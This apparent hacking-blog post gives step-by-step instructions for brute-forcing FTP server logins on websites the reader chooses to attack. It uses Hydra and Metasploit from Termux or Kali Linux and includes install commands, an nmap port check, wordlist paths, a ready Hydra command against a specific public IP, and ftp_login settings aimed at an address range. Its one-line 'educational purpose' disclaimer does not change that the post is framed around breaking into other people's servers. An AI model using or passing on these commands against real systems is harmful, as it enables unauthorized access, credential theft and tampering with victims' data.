Hi…hackstars, In this post ‘m gonna take you all the way through on How to Hack ftp server and furthermore how to gain root access to manipulate databases. All these actions can be done both via smartphone or PC. So lets get started on

How to Hack FTP Server using Hydra and Metasploit :

For Smartphone users :

  • Install Termux via Playstore.Open Termux ,it will install all necessary packages(it take few seconds, time will depend on your connection speed).Now type these commands to download necessary packages.

apt-get update &&  apt-get upgrade

pkg install python

pkg install python2

pkg install git

pkg install dnsutils

pkg install nmap

Now we are ready to go…

Using Hydra to Hack FTP Server:

For Smartphone users they just need to download Hydra which can be done by following command

pkg install hydra

For PC linux users(especially Kali Linux) Hydra is pre-installed.

Now both Smartphone users or linux PC users just type the commands as shown :

  1. First you have to find out the IP address of website onto which you want to attack. For this you can try dnslookup or any online tools like iplookup or reverse dns.

2.  Now it’s time to check whether FTP port is up or not. For this use nmap.Hack FTP server nslookup    

2.  Meanwhile it’s time to check whether FTP port is up or not. For this use nmap.

 

3. It will give its output, check if ftp port(port 21) is open or up.

Hack FTP server POrt
Here as you can see Port 21 or ftp port is open,so we can further process the attack.

4. Choose a username and password list for BruteForcing the ftp admin panel. For Kali linux users many password lists are certainly available in
/usr/share/wordlists/.  For example – RockYou.

Smartphone users can download username list and password list from any website they want or even they can create a .txt file and write password in it line by line.
Same procedure is for username too.

 

Also Read :-  Hack an Android Phone with another Android

5. Now the final step is to launch the attack via Hydra

Syntax for Hydra is >

hydra  -d  -L  /username-list path -P  /password-list path ftp : ip_address

As in my case username list file is username.txt & password list file is password.txt and both are stored in downloads folder of my phone.
So, here’s the command in my case

 

hydra -d  -L /storage/emulated/0/username.txt -P /storage/emulated/0/password.txt ftp://50.60.120.13

Here -d  will show you each password attempt  ,you can also ignore it. Its optional.
Likewise if you want to use only one username you can use -l (small L) in place of -L and then in place of username_file path just write that username that you want. Same in case of password if you want to use only one password just replace -P with -p.

After that you are all done, if any password matches it will show you the result.

 

Using Metasploit :

  • For Smartphone users they just need to download Metasploit-Framework which can be done by following command

pkg install unstable-repo

pkg Install metasploit

  • For PC linux users(especially Kali Linux) Metasploit is pre-installed.

Now we can get started,

1. Firstly launch Metasploit-Framework by typing following command

msfconsole

or

msfvenom

2.  Secondly write following commands

msf auxiliary(ftp_login) > set RHOSTS 192.168.69.50-254

msf auxiliary(ftp_login) > set THREADS 205

msf auxiliary(ftp_login) > set USERNAME username-list

msf auxiliary(ftp_login) > set PASSWORD password-list

If you want to use username-list or password-list you can simply write the path  at suitable positions.

Now just be patient meanwhile let it crack the admin panel.
Once it gets the correct id and password it will show you.

So, this is how you gonna hack ftp server using either Hydra or Metasploit-Framework.

Note – This is only for educational purpose and I’m not responsible for any misuse or harm done.

If you need any help then feel free to ask me in comment.

Thanks for coming if you like it then please share it, you will be appreciated.😄


3 Comments

oprol evorter · September 29, 2019 at 8:55 AM

Hi , I do believe this is an excellent blog. I stumbled upon it on Yahoo , i will come back once again. Money and freedom is the best way to change, may you be rich and help other people.

Typicalcat86 · December 26, 2019 at 10:21 PM

Good blog! I truly love how it is nice on my eyes it is. I’m wondering how I could be notified whenever a new post has been made. I have subscribed to your RSS which may do the trick? Have a nice day!

Typicalcat59 · April 19, 2020 at 7:51 AM

http://tanguydewilliencourt.fr/fr/no-register-required-best-seniors-online-dating-services romanian seniors singles online dating site

Leave a Reply

Your email address will not be published. Required fields are marked *

Close Bitnami banner
Bitnami